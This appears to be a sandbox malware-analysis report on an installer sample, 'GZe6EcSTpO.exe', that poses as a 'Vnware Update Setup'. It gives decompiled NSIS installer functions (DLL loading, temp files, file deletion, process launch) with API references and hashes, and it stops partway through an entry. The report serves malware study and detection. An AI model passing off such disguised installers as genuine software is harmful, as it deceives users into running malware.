Opcode ID: 2bca6772d8b5bd0ee7270aab8cf33fb01df5ff6b4b3229d3153447144db67aca
Instruction ID: 9917b4e32c30e3d06e99a245a18197bb2030eb542a9362b48aff858cdbf0b6bf
Opcode Fuzzy Hash: 2bca6772d8b5bd0ee7270aab8cf33fb01df5ff6b4b3229d3153447144db67aca
Instruction Fuzzy Hash: C541A571A00515BACF107BA5CD45EAF3678EF45368F60823FF421F20E1D67C8A418AAE

Uniqueness

Uniqueness Score: -1.00%

Function 004062CA, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004062CA(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}

0x004062e1
0x004062ea
0x004062ec
0x004062ec
0x004062f0
0x00406302
0x004062fc
0x004062fc
0x004062fc
0x00406306
0x0040631a
0x0040632e
0x00406335

APIs

GetSystemDirectoryA.KERNEL32 ref: 004062E1
wsprintfA.USER32 ref: 0040631A
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E

Strings

UXTHEME, xrefs: 004062D3
\, xrefs: 004062F2
%s%s.dll, xrefs: 00406314

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
Instruction ID: 4b2e1b96e526c3afc1937c3159904a09e8452480974eeaf1dbd8ebd71d3b02b5
Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
Instruction Fuzzy Hash: 87F0F63050060AABEB14AB74DD0DFEB375CAB08305F14047AAA87E11C1EA78D9398B9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040273C, Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040273C(int __ebx) {
				void* _t26;
				long _t31;
				void* _t32;
				intOrPtr _t39;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402ACB(0xfffffff0);
				 *(_t56 - 0x34) = _t23;
				if(E004059A5(_t50) == 0) {
					E00402ACB(0xffffffed);
				}
				E00405B14(_t50);
				_t26 = E00405B39(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f418;
					 *(_t56 - 0x30) = _t31;
					_t32 = GlobalAlloc(0x40, _t31); // executed
					_t49 = _t32;
					if(_t49 != _t45) {
						E004031C4(_t45);
						E004031AE(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x3c) = _t54;
						if(_t54 != _t45) {
							E00402F9C( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20)); // executed
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x84) =  *_t54;
								E00405AF4( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x84);
							}
							GlobalFree( *(_t56 - 0x3c));
						}
						E00405BE0( *(_t56 + 8), _t49,  *(_t56 - 0x30)); // executed
						GlobalFree(_t49);
						_t39 = E00402F9C(0xffffffff,  *(_t56 + 8), _t45, _t45); // executed
						 *((intOrPtr*)(_t56 - 0xc)) = _t39;
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x34));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x0040273c
0x0040273e
0x0040274a
0x0040274d
0x00402757
0x0040275b
0x0040275b
0x00402761
0x0040276e
0x00402776
0x00402779
0x0040277f
0x0040278d
0x00402790
0x00402792
0x00402796
0x00402799
0x004027a2
0x004027ae
0x004027b2
0x004027b5
0x004027bf
0x004027e4
0x004027c6
0x004027cb
0x004027d3
0x004027d9
0x004027de
0x004027de
0x004027eb
0x004027eb
0x004027f8
0x004027fe
0x0040280b
0x00402810
0x00402810
0x00402816
0x00402816
0x00402821
0x00402822
0x00402826
0x0040282a
0x00402830
0x00402830
0x00402837
0x0040223d
0x0040295a
0x00402966

APIs

GlobalAlloc.KERNELBASE(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
GlobalFree.KERNEL32 ref: 004027EB
GlobalFree.KERNEL32 ref: 004027FE
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: b03ec226f00110ddb90d6a486c0fe9115b129a618ac77c99842a4a7e133301bb
Instruction ID: a22fe22bcc3eabd59056b14894fa73c1d09c67f360634fc0aee3e8da3dcac443
Opcode Fuzzy Hash: b03ec226f00110ddb90d6a486c0fe9115b129a618ac77c99842a4a7e133301bb
Instruction Fuzzy Hash: 72219F71800124BBDF217FA5DE49E9E7B79AF09364F14423AF510762E0CB7959019FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405B68, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B68(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3b4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}

0x00405b6c
0x00405b72
0x00405b73
0x00405b73
0x00405b78
0x00405b79
0x00405b7c
0x00405b86
0x00405b93
0x00405b96
0x00405b9e
0x00000000
0x00000000
0x00405ba2
0x00000000
0x00000000
0x00405ba4
0x00000000
0x00405ba4
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405B7C
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B96

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6B
"C:\Users\user\Desktop\GZe6EcSTpO.exe" , xrefs: 00405B68
nsa, xrefs: 00405B73

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\GZe6EcSTpO.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2241533168
Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
Instruction ID: 343f4ea9f9204f9b983ce224a42535e265f7560d01468737dbca66c928219fc6
Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
Instruction Fuzzy Hash: 59F0A7363082087BDB108F56DD04B9B7BADDF91750F10803BFA48DB290D6B4E9548B58

Uniqueness

Uniqueness Score: -1.00%

Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402ACB(0xfffffff0);
				_t13 = E004059D1(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405963(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E0040560A(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E00405627(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E0040558D(_t28);
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405FA0("C:\\Users\\hardz\\Desktop", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}

0x004015bb
0x004015c2
0x004015c5
0x004015ca
0x004015ce
0x004015d0
0x004015d8
0x004015da
0x004015dc
0x004015e0
0x004015e3
0x004015fb
0x004015fc
0x004015e5
0x004015e5
0x004015e8
0x00000000
0x004015f3
0x004015f4
0x004015f4
0x004015e8
0x00401603
0x0040160a
0x00401617
0x00401617
0x0040160c
0x0040160d
0x00401615
0x00000000
0x00000000
0x00401615
0x0040160a
0x0040161a
0x0040161d
0x0040161f
0x00401620
0x004015d0
0x00401627
0x00401652
0x0040223d
0x00401629
0x0040162b
0x00401636
0x0040163c
0x00401644
0x0040164a
0x0040164a
0x00401644
0x0040295a
0x00402966

APIs

Part of subcall function 004059D1: CharNextA.USER32(?,?,0042BC78,?,00405A3D,0042BC78,0042BC78,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,00405788,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059DF
Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 0040558D: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055D0

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\Desktop,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\Desktop, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\Desktop
API String ID: 1892508949-1669384263
Opcode ID: 8df7452d859edee793d26762cb55b4ffea6b58eab6d5767d4ce02fbd1f844cf5
Instruction ID: df45c6993d6bc62f872b04d9318ddfa5d1dc0af5cd0ca16cddc76749c9d8dee7
Opcode Fuzzy Hash: 8df7452d859edee793d26762cb55b4ffea6b58eab6d5767d4ce02fbd1f844cf5
Instruction Fuzzy Hash: B6112731608152EBCF217BB54D419BF66B0DA92324F68093FE5D1B22E2D63D49439A3F

Uniqueness

Uniqueness Score: -1.00%

Function 00405A26, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405A26(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405FA0(0x42bc78, _a4);
				_t21 = E004059D1(0x42bc78);
				if(_t21 != 0) {
					E0040620A(_t21);
					if(( *0x42f41c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x42bc78;
						while(1) {
							_t11 = lstrlenA(0x42bc78);
							_push(0x42bc78);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E004062A3();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E0040597F(0x42bc78);
								continue;
							} else {
								goto L1;
							}
						}
						E00405938();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405a32
0x00405a3d
0x00405a41
0x00405a48
0x00405a54
0x00405a60
0x00405a60
0x00405a78
0x00405a79
0x00405a80
0x00405a81
0x00000000
0x00000000
0x00405a64
0x00405a6b
0x00405a73
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a6b
0x00405a83
0x00405a89
0x00000000
0x00405a97
0x00405a56
0x00405a5a
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a5a
0x00405a43
0x00000000

APIs

Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,Vnware Update Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD

Part of subcall function 004059D1: CharNextA.USER32(?,?,0042BC78,?,00405A3D,0042BC78,0042BC78,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,00405788,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059DF
Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8

lstrlenA.KERNEL32(0042BC78,00000000,0042BC78,0042BC78,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,00405788,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A79
GetFileAttributesA.KERNELBASE(0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,00000000,0042BC78,0042BC78,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,00405788,?,74B5FA90,C:\Users\user\AppData\Local\Temp\), ref: 00405A89

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A26

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3916508600
Opcode ID: fd356b8919337fe01a24efca68e850dbe45d0084ba8af47b2787d0181ceea021
Instruction ID: ffa0610acded3722bed2d7d96fb1c232a132fb9d66bc0fefd21ab2e8d06464ef
Opcode Fuzzy Hash: fd356b8919337fe01a24efca68e850dbe45d0084ba8af47b2787d0181ceea021
Instruction Fuzzy Hash: 4EF04C25305D6556C622723A1C89AAF1A04CED3324759073FF891F12D2DB3C8A439DBE

Uniqueness

Uniqueness Score: -1.00%

Function 0040563F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040563F(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c078->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c078,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405648
0x00405668
0x00405670
0x00405675
0x00000000
0x0040567b
0x0040567f

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 00405668
CloseHandle.KERNEL32(?), ref: 00405675

Strings

Error launching installer, xrefs: 00405652

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
Instruction ID: cd0db04dc70eb2db95c0507bc2818c98f3fa4352d1ad4fdf37015ca79918bc5c
Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
Instruction Fuzzy Hash: 2FE046F0640209BFEB109FB0EE49F7F7AADEB00704F404561BD00F2190EA7498088A7C

Uniqueness

Uniqueness Score: -1.00%

Function 00405720, Relevance: 4.5, APIs: 3, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00405720(void* __eflags, CHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				CHAR* _t14;

				_t14 = _a4;
				_t13 = E00405B14(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileA(); // executed
				} else {
					_t9 = RemoveDirectoryA(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesA(_t14, _t13); // executed
					}
					goto L8;
				} else {
					return 1;
				}
			}

0x00405721
0x0040572c
0x00405731
0x00405761
0x00000000
0x00405761
0x00405738
0x00405739
0x00405743
0x0040573b
0x0040573b
0x0040573b
0x0040574b
0x00405757
0x0040575b
0x0040575b
0x00000000
0x0040574d
0x00000000
0x0040574f

APIs

Part of subcall function 00405B14: GetFileAttributesA.KERNELBASE(?,?,0040572C,?,?,00000000,0040590F,?,?,?,?), ref: 00405B19
Part of subcall function 00405B14: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B2D

RemoveDirectoryA.KERNELBASE(?,?,?,00000000,0040590F), ref: 0040573B
DeleteFileA.KERNELBASE(?,?,?,00000000,0040590F), ref: 00405743
SetFileAttributesA.KERNELBASE(?,00000000), ref: 0040575B

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: 4390be6e2ef8d2df5986f304b1f187f42b365e072cd754739d21517cc83f2d57
Instruction ID: 41a59d98901dadf9faebb98bb098dbd3bab940c68288cb1340f4b8977cea5a50
Opcode Fuzzy Hash: 4390be6e2ef8d2df5986f304b1f187f42b365e072cd754739d21517cc83f2d57
Instruction Fuzzy Hash: FCE0E531115A9197C61177308E0CA5B2AD8DFC6324F09493AF492B31C0C778444ADA6E

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f450;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ebec =  *0x42ebec + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ebec, 0x7530,  *0x42ebd4), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
Instruction ID: f90ead50954d10692fd747fd35726c7c61e2fcf071c036ef7d407bcf2d164b43
Opcode Fuzzy Hash: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
Instruction Fuzzy Hash: 4601F4317242109BE7199B399D04B6A3698E710719F54823FF852F61F1D678EC028B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00406338, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406338(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a240);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
				}
				_t5 = E004062CA(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406340
0x00406343
0x0040634a
0x00406352
0x0040635e
0x00000000
0x00406365
0x00406355
0x0040635c
0x00000000
0x0040636d
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
GetProcAddress.KERNEL32(00000000,?), ref: 00406365

Part of subcall function 004062CA: GetSystemDirectoryA.KERNEL32 ref: 004062E1
Part of subcall function 004062CA: wsprintfA.USER32 ref: 0040631A
Part of subcall function 004062CA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
Instruction ID: b6ec051a43833f1e75efb6c097fb1b7945085d0745a1c08503facd7b36b6f755
Opcode Fuzzy Hash: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
Instruction Fuzzy Hash: 88E08C32604210ABD2106A709E0493B63A9AF88710306483EFA46F2240DB389C3696AD

Uniqueness

Uniqueness Score: -1.00%

Function 00405B39, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405B39(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405b3d
0x00405b4a
0x00405b5f
0x00405b65

APIs

GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\GZe6EcSTpO.exe,80000000,00000003), ref: 00405B3D
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
